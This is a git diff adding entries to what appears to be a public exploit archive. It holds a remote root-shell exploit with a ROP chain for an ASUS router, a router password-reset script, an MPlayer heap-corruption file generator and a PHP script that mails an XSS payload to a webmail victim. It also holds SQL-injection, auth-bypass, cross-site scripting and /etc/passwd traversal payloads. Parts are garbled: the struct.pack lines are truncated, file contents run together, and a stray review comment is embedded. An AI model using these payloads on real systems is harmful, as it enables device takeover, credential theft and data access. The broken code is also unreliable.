error: + print "\n [!!!] ERROR! %s %s [!!!]\n\n" % (type(error), error) + exit(0) + + try: + print " [*] Sending fingerprint request." + netSock.send("HEAD / HTTP/1.1\r\n\r\n") + netData = netSock.recv(1024) + except Exception as error: + print "\n [!!!] ERROR! %s %s [!!!]\n\n" % (type(error), error) + exit(0) + + try: + print " [*] Closing network socket.\n" + netSock.close() + except Exception as error: + print "\n [!!!] ERROR! %s %s [!!!]\n\n" % (type(error), error) + + for item in fprint: + if item in netData: + print " [!!!] 
Target system found in signature list - Result: %s [!!!]\n" % item + sleep(1) + found = item + if found == None: + print " [!!!] Server banner doesn't match available targets. [!!!]\n" + sleep(1) + exit(0) + else: + return found + + +def targURL(): + + while True: + + URL = raw_input("\n[*] Please enter the URL of the router. Ex. http://192.168.1.1\n>") + if len(URL) != 0 and URL[0:7] == "http://" or URL[0:8] == "https://": + return URL.lower() + else: + print "\n\n [!!!] Target URL cant be null and must contain http:// or https:// [!!!]\n" + sleep(1) + + +def creds(): + + while True: + + User = raw_input("\n[*] Please enter the username for the routers HTTP Basic Authentication:\n>") + Pass = raw_input("\n[*] Please enter the password for the supplied username:\n>") + if len(User) != 0: + return User, Pass + else: + print "\n [!!!] Username cant be null [!!!]\n" + sleep(1) + + +def basicAuth(): + + auth = None + + while auth != "yes" and auth != "no": + auth = raw_input("\n[*] Would you like to use HTTP Basic Authentication? \"yes\" or \"no\"\n>") + + if auth.lower() == "yes": + print "\n\n[!!!] You chose to use HTTP Basic Authentication [!!!]\n" + sleep(1) + User, Pass = creds() + return base64.encodestring("%s:%s" % (User, Pass)).replace("\n", "") + elif auth.lower() == "no": + print "\n\n[!!!] You chose not to use HTTP Basic Authentication. [!!!]\n" + sleep(1) + return 0 + else: + print "\n\n[!!!] Error: You entered %s. Please enter \"yes\" or \"no\"! [!!!]\n" % auth + sleep(1) + + +def sigHandle(signum, frm): # Signal handler + + print "\n\n[!!!] Cleaning up the exploit... 
[!!!]\n" + sleep(1) + exit(0) + + +def main(): + + print """\n[*] Title: ASUS RT-N56U Remote Root Shell Exploit - apps_name +[*] Discovered and Reported: October 2013 +[*] Discovered/Exploited By: Jacob Holcomb/Gimppy - Security Analyst @ ISE +[*] Contact: Twitter - @rootHak42 +[*] Software Vendor: http://asus.com +[*] Exploit/Advisory: http://securityevaluators.com, http://infosec42.blogspot.com/ +[*] Software: httpd (Listens on TCP/80 and TCP/443) +[*] Tested Firmware Versions: 3.0.0.4.374_979 (Other versions may be vulnerable) +[*] CVE: ASUS RT-N56U Buffer Overflow: CVE-2013-6343\n""" + signal.signal(signal.SIGINT, sigHandle) #Setting signal handler for ctrl + c + + target = targURL() + try: + print "\n [*] Creating network socket" + netSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + if target[0:5] == "https": + host = target[8:] + port = 443 + print " [*] Preparing SSL/TLS support." + https_netSock = ssl.wrap_socket(netSock) + finger = fingerPrint(host, port, https_netSock) + else: + host = target[7:] + port = 80 + finger = fingerPrint(host, port, netSock) + except Exception as error: + print "\n [!!!] ERROR! 
%s %s [!!!]\n\n" % (type(error), error) + exit(0) + + auth = basicAuth() + junk = "\x42" * 109 + link_nop = "2Aa3" + + #Base address of ld_uClibc and libc in httpd address space + ld_uClibcBase = 0x2aaa8000 + libcBaseAddr = 0x2ab5f000 + + #Rop Chain + #: move v0,s0 -> sched_yield() + #: lw ra,28(sp) -> Rop2 + #: lw s0,24(sp) + #: jr ra + #: addiu sp,sp,32 + saved_ra1 = struct.pack(": lw ra,36(sp) -> Rop 3 + #<_dl_runtime_pltresolve+72>: lw a0,16(sp) + #<_dl_runtime_pltresolve+76>: lw a1,20(sp) + #<_dl_runtime_pltresolve+80>: lw a2,24(sp) + #<_dl_runtime_pltresolve+84>: lw a3,28(sp) + #<_dl_runtime_pltresolve+88>: addiu sp,sp,40 + #<_dl_runtime_pltresolve+92>: move t9,v0 + #<_dl_runtime_pltresolve+96>: jr t9 -> jump sched_yield() + #<_dl_runtime_pltresolve+100>: nop + saved_ra2 = struct.pack(": addiu a1,sp,24 -> ptr to stack + #: lw gp,16(sp) + #: lw ra,32(sp) -> Rop 4 + #: jr ra -> jump Rop 4 + #: addiu sp,sp,40 + saved_ra3 = struct.pack(" ptr to jalr sp on stack + #addiu a0,a0,56 + #jr t9 -> jump to stack + #move a1,a2 + saved_ra4 = struct.pack("%3E&hidessid=off&security=wpawpa2&authmethodselect=psk&wpapp=---&pmkcaching=off&confirm=Confirm HTTP/1.1 +Host: 192.168.1.1 +User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-us,en;q=0.5 +Accept-Encoding: gzip, deflate +DNT: 1 +Proxy-Connection: keep-alive +Referer: http://192.168.1.1/webconfig/wlan/country.html +Cookie: httpTimeOut=None +Authorization: Basic VGhpc2lzbm90Ok15b3JnaW5hbHBhc3N3b3Jk + +Attack details +The variable Network Name (SSID): has been set to "> \ No newline at end of file diff --git a/platforms/hardware/webapps/31088.py b/platforms/hardware/webapps/31088.py new file mode 100755 index 000000000..341361e5a --- /dev/null +++ b/platforms/hardware/webapps/31088.py 
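Review bot: In `targURL`, the condition `if len(URL) != 0 and URL[0:7] == "http://" or URL[0:8] == "https://":` mixes `and` with `or` without parentheses, so the non-empty check only guards the `http://` arm; write it as `if len(URL) != 0 and (URL[0:7] == "http://" or URL[0:8] == "https://"):`. In `fingerPrint`, `found == None` should be `found is None`. The remainder of this hunk cannot be reviewed from this page: everything between angle brackets was dropped in rendering, which truncates the `struct.pack("` calls in `main` and the lines after them, and the hunk's tail shows text that appears to belong to a different file in the same commit, so `main` effectively continues outside what is visible here.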
@@ -0,0 +1,59 @@ +# Exploit Title: BLUE COM Router - 5360/52018 Password Reset Exploit +# Date: 20/1/2013 +# Exploit Author: KAI (kaisai12) +# Home: CEH.VN +# Version: BCOM - 5360 + +# vulnerability - change password easy ! no protect ! +#var loc = 'password.cgi?'; +#switch ( idx ) { +# case 2: +# loc += 'sptPassword=' + encodeUrl(pwdNew.value); +# break; +# case 3: +# loc += 'usrPassword=' + encodeUrl(pwdNew.value); +# break; +# default: +# loc += 'sysPassword=' + encodeUrl(pwdNew.value); +# break; +# } +# +# var code = 'location="' + loc + '"'; +# eval(code); +# } +#} + + +import urllib +import sys + +def attackrouter(ip,password): + try: + params = urllib.urlencode({'sysPassword': str(password)}) + f = urllib.urlopen("http://"+ip+"/password.cgi?%s" % params) + print "[+] IP: %s - Reset password: %s" % (ip,password) + return + except: + print "[-] error" + + +def main(): + if len(sys.argv) > 2: + ip = sys.argv[1] + password = sys.argv[2] + print "--------------------------------------------------" + print "Router BCOM Exploit Execute Reset password modem " + print " author: KAI(CEH>VN) " + print "--------------------------------------------------" + print "[+] Sending exploit: OK" + attackrouter(ip,password) + else: + print "[-] Command error" + print "[-] Use:bluecomRT.py " + +if __name__ == '__main__': + main() + + + + diff --git a/platforms/linux/dos/30894.txt b/platforms/linux/dos/30894.txt new file mode 100755 index 000000000..30c22da8f --- /dev/null +++ b/platforms/linux/dos/30894.txt 
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26899/info
+
+PeerCast is prone to multiple buffer-overflow vulnerabilities because it fails to adequately bounds-check user-supplied input before copying it to an insufficiently sized buffer.
+
+Successfully exploiting these issues will allow an attacker to execute arbitrary code with the privileges of the user running the affected application. Failed exploit attempts will likely crash the application.
+
+These issues affect PeerCast 0.12.17, SVN 334 and prior versions.
+
+http://www.exploit-db.com/sploits/30894.zip
\ No newline at end of file
diff --git a/platforms/linux/dos/31018.txt b/platforms/linux/dos/31018.txt
new file mode 100755
index 000000000..32a57c67c
--- /dev/null
+++ b/platforms/linux/dos/31018.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/27249/info
+
+GStreamer is prone to multiple unspecified denial-of-service vulnerabilities when handling malformed media files.
+
+Successfully exploiting this issue allows remote attackers to deny service to legitimate users.
+
+These issues affect GStreamer 0.10.15; other versions may also be vulnerable.
+
+http://www.exploit-db.com/sploits/31018-1.mpg
+http://www.exploit-db.com/sploits/31018-2.mpg
+http://www.exploit-db.com/sploits/31018-3.m2v
+http://www.exploit-db.com/sploits/31018-4.m2v
\ No newline at end of file
diff --git a/platforms/linux/remote/30907.txt b/platforms/linux/remote/30907.txt
new file mode 100755
index 000000000..47395886c
--- /dev/null
+++ b/platforms/linux/remote/30907.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/26960/info
+
+The Adobe Flash Player ActiveX control is prone to a cross-domain scripting vulnerability.
+
+An attacker may leverage this issue to execute arbitrary JavaScript in the context of another domain.
+
+This issue affects Adobe Flash Player 9.0.48.0, 8.0.35.0, and prior versions.
+
+NOTE: This issue was previously disclosed in BID 26929 (Adobe Flash Player Multiple Security Vulnerabilities) but has been assigned its own BID because new technical details are available.
+
+http://www.exploit-db.com/sploits/30907.as
\ No newline at end of file
diff --git a/platforms/linux/remote/30971.txt b/platforms/linux/remote/30971.txt
new file mode 100755
index 000000000..c7c3fe26a
--- /dev/null
+++ b/platforms/linux/remote/30971.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/27103/info
+
+Georgia SoftWorks Secure Shell Server is prone to multiple remote code-execution vulnerabilities:
+
+- A format-string vulnerability
+- Two buffer-overflow vulnerabilities.
+
+Successfully exploiting these issues allows remote attackers to execute arbitrary machine code with SYSTEM-level privileges, facilitating the complete compromise of affected computers.
+
+Georgia SoftWorks Secure Shell Server 7.01.0003 is vulnerable to these issues; other versions may also be affected.
+
+http://www.exploit-db.com/sploits/30971.zip
\ No newline at end of file
diff --git a/platforms/linux/remote/31076.py b/platforms/linux/remote/31076.py
new file mode 100755
index 000000000..0a2127f96
--- /dev/null
+++ b/platforms/linux/remote/31076.py
@@ -0,0 +1,59 @@ +source: http://www.securityfocus.com/bid/27499/info + +MPlayer is prone to a remote code-execution vulnerability because it fails to sanitize certain 'MOV' file tags before using them to index heap memory. + +An attacker can exploit this issue to execute arbitrary code, which can result in the complete compromise of the computer. Failed exploit attempts will result in a denial-of-service condition. + +This issue affects MPlayer 1.0rc2; other versions may also be affected. + +#!/bin/python + +import struct +import sys + +def mkatom(type,data): + if len(type) != 4: + raise "type must by of length 4!!!" + mov = "" + mov += struct.pack(">L",len(data)+8) + mov += type + mov += data + return mov + +def poc(address, block_size): + + what=struct.pack(">L", 0x41414141) * 2 # Writes an 8 bytes chunk + base= ((address - 8) / block_size) +1 + + ftyp = mkatom("ftyp","3gp4"+"\x00\x00\x02\x00"+"3gp4"+"3gp33gp23gp1") + mdat = mkatom("mdat","MALDAAAAAD!") + stsc = mkatom("stsc",struct.pack(">L",1) + \ + struct.pack(">L",2) + \ + struct.pack(">L",base) + \ + what + \ + struct.pack(">L",base+300)+what) + trak = mkatom("trak",stsc) + moov = mkatom("moov",trak) + + file = ftyp + mdat + moov + return file + +try: + if sys.argv[2] != "linux": + evilness = poc(0x0122e000, 24) #Windows XP SP2 Prof. ES + else: + evilness = poc(0x088aa020, 20) #Linux Gentoo + + print "[+] Generating file: %s" % sys.argv[1] + file = open(sys.argv[1], "wb") + file.write(evilness) + file.close() + print "[+] Done." + +except Exception, e: + print "[+] Usage: python mplayer_poc.py filename.mov windows (For +WinXP Prof SP2 ES)" + print " python mplayer_poc.py filename.mov linux (For +Linux Gentoo)" + + diff --git a/platforms/multiple/dos/30943.txt b/platforms/multiple/dos/30943.txt new file mode 100755 index 000000000..47f7db193 --- /dev/null +++ b/platforms/multiple/dos/30943.txt 
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27048/info
+
+Libnemesi is prone to multiple buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied input.
+
+Attackers can exploit these issues to execute arbitrary code in the context of applications that use the library. Failed attacks will cause denial-of-service conditions.
+
+Libnemesi 0.6.4-rc1 is vulnerable; other versions may also be affected.
+
+http://www.exploit-db.com/sploits/30943.zip
\ No newline at end of file
diff --git a/platforms/multiple/dos/30989.txt b/platforms/multiple/dos/30989.txt
new file mode 100755
index 000000000..cae760495
--- /dev/null
+++ b/platforms/multiple/dos/30989.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27141/info
+
+Pragma Systems FortressSSH is prone to a remote denial-of-service vulnerability because it fails to adequately handle certain exceptions when processing overly long user-supplied input.
+
+Attackers can exploit this issue to exhaust the maximum number of connections alotted for servers. Successful attacks will deny access to legitimate users.
+
+FortressSSH 5.0 is vulnerable; other versions may also be affected.
+
+http://www.exploit-db.com/sploits/30989.zip
\ No newline at end of file
diff --git a/platforms/multiple/dos/30990.txt b/platforms/multiple/dos/30990.txt
new file mode 100755
index 000000000..03ded2c7e
--- /dev/null
+++ b/platforms/multiple/dos/30990.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/27142/info
+
+Foxit WAC Server is prone to a denial-of-service vulnerability because the application fails to perform adequate boundary checks on user-supplied data.
+
+An attacker can exploit this issue to crash the affected application, denying service to legitimate users.
+
+This issue affects Foxit WAC Server 2.0 Build 3503 and prior versions.
+
+http://www.exploit-db.com/sploits/30990-1.zip
+http://www.exploit-db.com/sploits/30990-2.zip
\ No newline at end of file
diff --git a/platforms/multiple/dos/30991.txt b/platforms/multiple/dos/30991.txt
new file mode 100755
index 000000000..0d0c4b776
--- /dev/null
+++ b/platforms/multiple/dos/30991.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27143/info
+
+Pragma TelnetServer is prone to a denial-of-service vulnerability because it fails to adequately handle certain telnet options.
+
+Attackers can leverage this issue to terminate the server and cause denial-of-service conditions.
+
+This issue affects Pragma TelnetServer 7.0 Build 4 Revision 589; other versions may also be vulnerable.
+
+http://www.exploit-db.com/sploits/30991.zip
\ No newline at end of file
diff --git a/platforms/multiple/dos/31100.txt b/platforms/multiple/dos/31100.txt
new file mode 100755
index 000000000..bdfb42dd4
--- /dev/null
+++ b/platforms/multiple/dos/31100.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27593/info
+
+Anon Proxy Server is prone to a remote buffer-overflow vulnerability because the application fails to sufficiently bounds-check user-supplied input.
+
+Successful exploits allow remote attackers to execute arbitrary code in the context of the vulnerable application, facilitating the compromise of affected computers.
+
+Versions prior to Anon Proxy Server 0.103 are vulnerable to this issue.
+
+print "A" x 430 . '"' x 29 . "A" x 40 . "\n"
\ No newline at end of file
diff --git a/platforms/multiple/local/30970.txt b/platforms/multiple/local/30970.txt
new file mode 100755
index 000000000..453d24768
--- /dev/null
+++ b/platforms/multiple/local/30970.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27102/info
+
+White_Dune is affected by a format-string vulnerability and a buffer-overflow vulnerability.
+
+Exploiting these issues can allow local attackers to execute arbitrary code in the context of the application.
+
+Versions prior to White_Dune 0.29beta795 are affected.
+
+http://www.exploit-db.com/sploits/30970.zip
\ No newline at end of file
diff --git a/platforms/multiple/remote/30944.txt b/platforms/multiple/remote/30944.txt
new file mode 100755
index 000000000..9bf8055e3
--- /dev/null
+++ b/platforms/multiple/remote/30944.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27049/info
+
+Feng is prone to multiple remote buffer-overflow and denial-of-service vulnerabilities.
+
+Successfully exploiting these issues allows remote attackers to execute arbitrary code in the context of the server application. Attackers may also crash the application, denying service to legitimate users.
+
+Feng 0.1.15 is vulnerable to these issues; other versions may also be affected.
+
+http://www.exploit-db.com/sploits/30944.zip
\ No newline at end of file
diff --git a/platforms/novell/remote/31095.txt b/platforms/novell/remote/31095.txt
new file mode 100755
index 000000000..fe2750471
--- /dev/null
+++ b/platforms/novell/remote/31095.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/27582/info
+
+Novell GroupWise WebAccess is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+Exploiting these issues may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
+
+Novell GroupWise WebAccess 7 is vulnerable; other versions may also be affected.
+
+http://www.example.com/servlet/webacc?Error=[XSS]
+http://www.example.com/servlet/webacc?User.html=[XSS]
\ No newline at end of file
diff --git a/platforms/php/webapps/30877.txt b/platforms/php/webapps/30877.txt
new file mode 100755
index 000000000..b92023bb9
--- /dev/null
+++ b/platforms/php/webapps/30877.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26800/info
+
+Roundcube Webmail is prone to an input-validation vulnerability because it fails to sanitize HTML email messages.
+
+Attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user. Successful attacks can allow attackers to steal cookie-based authentication credentials from legitimate users of the site; other attacks are also possible.
+
+Roundcube Webmail 0.1rc2 is vulnerable; other versions may also be affected.
+
+http://www.exploit-db.com/sploits/30877.eml
\ No newline at end of file
diff --git a/platforms/php/webapps/31074.txt b/platforms/php/webapps/31074.txt
new file mode 100755
index 000000000..a0db41d6a
--- /dev/null
+++ b/platforms/php/webapps/31074.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27492/info
+
+Nucleus CMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+The issue affects Nucleus CMS 3.31; other versions may also be vulnerable.
+
+http://www.example.com/[installdir]/action.php/">
\ No newline at end of file
diff --git a/platforms/php/webapps/31075.txt b/platforms/php/webapps/31075.txt
new file mode 100755
index 000000000..0df2d14f8
--- /dev/null
+++ b/platforms/php/webapps/31075.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27498/info
+
+AmpJuke is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+AmpJuke 0.7.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/scriptpath/index.php?what=search&start=0&dir=ASC&sorttbl=track&order_by=track.name&limit=[Xss]
\ No newline at end of file
diff --git a/platforms/php/webapps/31077.txt b/platforms/php/webapps/31077.txt
new file mode 100755
index 000000000..6bf75bffc
--- /dev/null
+++ b/platforms/php/webapps/31077.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27508/info
+
+The 'com_buslicense' component for Mambo/Joomla is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/index.php?option=com_buslicense§ionid=9999&Itemid=9999&task=list&aid=-1/**/union/**/select/**/0,username,0x3a,password,4,5,6,7,8,9,10,11,12,13,14/**/from/**/mos_users/*
\ No newline at end of file
diff --git a/platforms/php/webapps/31079.txt b/platforms/php/webapps/31079.txt
new file mode 100755
index 000000000..d3652d99e
--- /dev/null
+++ b/platforms/php/webapps/31079.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27517/info
+
+webSPELL is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+webSPELL 4.01.02 is vulnerable; other versions may also be affected.
+
+http://www.example.com/path/index.php?site=whoisonline&sort=">[xss code]
\ No newline at end of file
diff --git a/platforms/php/webapps/31080.txt b/platforms/php/webapps/31080.txt
new file mode 100755
index 000000000..dbf735d38
--- /dev/null
+++ b/platforms/php/webapps/31080.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27518/info
+
+YeSiL KoRiDoR Ziyaretçi Defteri is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/defter/index.php?sayfa=[sqL inj. code here ..]
\ No newline at end of file
diff --git a/platforms/php/webapps/31082.txt b/platforms/php/webapps/31082.txt
new file mode 100755
index 000000000..8ff446df3
--- /dev/null
+++ b/platforms/php/webapps/31082.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27547/info
+
+Liferay Enterprise Portal is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+This issue affects Liferay Enterprise Portal 4.3.6.
+
+User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)</script>
diff --git a/platforms/php/webapps/31083.txt b/platforms/php/webapps/31083.txt
new file mode 100755
index 000000000..f1b6d405b
--- /dev/null
+++ b/platforms/php/webapps/31083.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27559/info
+
+Nilson's Blogger is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability using directory-traversal strings to include local files in the context of the webserver process. This may allow the attacker to obtain potentially sensitive information; other attacks are also possible.
+
+This issue affects Nilson's Blogger 0.11; other versions may also be vulnerable.
+
+http://www.example.com/comments.php?thispost=../../../../../../../../../../etc/passwd
\ No newline at end of file
diff --git a/platforms/php/webapps/31084.txt b/platforms/php/webapps/31084.txt
new file mode 100755
index 000000000..62b2d79d9
--- /dev/null
+++ b/platforms/php/webapps/31084.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27563/info
+
+Archimede Net 2000 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/telefonia/E-Guest_show.php?display=(sql)
\ No newline at end of file
diff --git a/platforms/php/webapps/31085.txt b/platforms/php/webapps/31085.txt
new file mode 100755
index 000000000..ff3a4e1ca
--- /dev/null
+++ b/platforms/php/webapps/31085.txt
@@ -0,0 +1,26 @@
+# Exploit Title : Doodle4Gift <= Multiple Vulnerabilities
+# Author : Dr.NaNo
+# Date : H-1435/3/18 - 2014/1/19
+# Software Link : http://www.hotscripts.com/listing/doodle4gift/
+# Software Link2: https://sites.google.com/site/doodle4gift/
+#
+#
+# (1) Cross Site Scripting (XSS):
+#
+#
+# http://localhost/{path}/index.php?action=showprofile&profile=(XSS)
+#
+# http://localhost/{path}/index.php?action=showprofile&profile=
+#
+#
+#
+# (2) information disclosure:
+#
+#
+# http://localhost/{path}/data/doodle4gift.xml <= there are {Id,Password,Email} :)
+#
+#
+#
+# A special gift for: (P0c Team),(V4-Team):?????? ????? ??
+#
+#
diff --git a/platforms/php/webapps/31086.php b/platforms/php/webapps/31086.php
new file mode 100755
index 000000000..92a050cd3
--- /dev/null
+++ b/platforms/php/webapps/31086.php
@@ -0,0 +1,86 @@ +Click Me, Please...\r\n + + NOTE: javascript html char encode = javaScRipt + + then you will be able to get into the victim's mailbox via the url: + http://[WebSite]/[AfterLogic]/Default.aspx + +## Phpmailer class is included in the exploit so you need to download it here and run the exploit in the phpmailer directory: + http://code.google.com/a/apache-extras.org/p/phpmailer/downloads/list + + +*/ + +echo "AfterLogic Pro and Lite <= 7.1.1.1 XSS Exploit"; +require_once('class.phpmailer.php'); + +$mail = new PHPMailer(true); // the true param means it will throw exceptions on errors, which we need to catch +$mail->IsSMTP(); // telling the class to use SMTP + + +/* SETTINGS */ +$smtp_user = "username"; // Any valid smtp account +$smtp_pass = "password"; // Your PASSWORD +$smtp_port = "25"; // SMTP PORT Default: 25 +$smtp_host = "localhost"; // Any valid smtp server +$from = "attacker@email.com"; // Any email +$victim = "victim@email.com"; // Victim email on afterlogic webmail. +$subject = "Salam"; // Subject + +/* Body Text */ +$body = 'Click Me, Please...\r\n'; + + + +try { + $mail->SMTPDebug = 2; // enables SMTP debug information (for testing) + $mail->SMTPAuth = false; // enable SMTP authentication + $mail->Host = $smtp_host; + $mail->Port = $smtp_port; + $mail->Username = $smtp_user; // SMTP account username + $mail->Password = $smtp_pass; // SMTP account password + + $mail->SetFrom($from, 'Attacker'); + $mail->AddReplyTo($from, 'Attacker'); + + $mail->AddAddress($victim, 'Victim'); + $mail->Subject = $subject; + + $mail->MsgHTML($body); + $mail->Send(); + echo "Message Sent OK

\n";
+} catch (phpmailerException $e) {
+ echo $e->errorMessage();
+} catch (Exception $e) {
+ echo $e->getMessage();
+}
+?>
+
+
+
diff --git a/platforms/php/webapps/31091.txt b/platforms/php/webapps/31091.txt
new file mode 100755
index 000000000..4ff982362
--- /dev/null
+++ b/platforms/php/webapps/31091.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27571/info
+
+Domain Trader is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Domain Trader 2.0 is vulnerable; prior versions may also be affected.
+
+http://www.example.com/script/catalog.php?mode=viewcategory&id=
\ No newline at end of file
diff --git a/platforms/php/webapps/31092.txt b/platforms/php/webapps/31092.txt
new file mode 100755
index 000000000..1bbf7f64d
--- /dev/null
+++ b/platforms/php/webapps/31092.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/27572/info
+
+WP-Footnotes plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. The plugin also insecurely exposes administrative functionality.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+This issue affects WP-Footnotes 2.2; other versions may also be vulnerable.
+
+http://www.example.com/wordpress/wp-content/plugins/wp-footnotes/admin_panel.php?wp_footnotes_current_settings[priority]=">
+
+http://www.example.com/wordpress/wp-content/plugins/wp-footnotes/admin_panel.php?wp_footnotes_current_settings[style_rules]=</textarea>
+
+http://www.example.com/wordpress/wp-content/plugins/admin_panel.php?wp_footnotes_current_settings[pre_footnotes]=</textarea>
+
+http://www.example.com/wordpress/wp-content/plugins/admin_panel.php?wp_footnotes_current_settings[post_footnotes]=</textarea>
\ No newline at end of file
diff --git a/platforms/php/webapps/31098.txt b/platforms/php/webapps/31098.txt
new file mode 100755
index 000000000..d81ca1c8f
--- /dev/null
+++ b/platforms/php/webapps/31098.txt
@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/27589/info
+
+Simple OS CMS is prone to an SQL-injection vulnerability because it fails to adequately sanitize user-supplied data.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Simple OS CMS 0.1c beta is vulnerable; other versions may also be affected.
+
+The following exploit information is available:
+
+Passing:
+
+username: admin' or 1=1/*
+password: something
+
+
+will bypass the authentication process.
\ No newline at end of file
diff --git a/platforms/php/webapps/31099.txt b/platforms/php/webapps/31099.txt
new file mode 100755
index 000000000..3071b3bae
--- /dev/null
+++ b/platforms/php/webapps/31099.txt
@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/27592/info
+
+Codice CMS is prone to an SQL-injection vulnerability because it fails to adequately sanitize user-supplied data.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+The following exploit information is available:
+
+Passing:
+
+username: admin' or 1=1/*
+password: something
+
+
+will bypass the authentication process.
+
diff --git a/platforms/php/webapps/31101.txt b/platforms/php/webapps/31101.txt
new file mode 100755
index 000000000..9805bb139
--- /dev/null
+++ b/platforms/php/webapps/31101.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27598/info
+
+HispaH Youtube Clone is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the context of an unsuspecting user. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/youtube/siteadmin/editor_files/includes/load_message.php?lang[please_wait]=[XSS]
\ No newline at end of file
diff --git a/platforms/windows/dos/30934.txt b/platforms/windows/dos/30934.txt
new file mode 100755
index 000000000..0e3593b26
--- /dev/null
+++ b/platforms/windows/dos/30934.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27021/info
+
+Total Player is prone to a denial-of-service vulnerability.
+
+An attacker can exploit this issue to crash the application. Given the nature of this issue, the attacker may be able to execute arbitrary code, but this has not been confirmed.
+
+This issue is reported to affect Total Player 3.0; other versions may also be vulnerable.
+
+http://www.exploit-db.com/sploits/30934.m3u
\ No newline at end of file
diff --git a/platforms/windows/dos/31105.py b/platforms/windows/dos/31105.py
new file mode 100755
index 000000000..0b6bc6a27
--- /dev/null
+++ b/platforms/windows/dos/31105.py
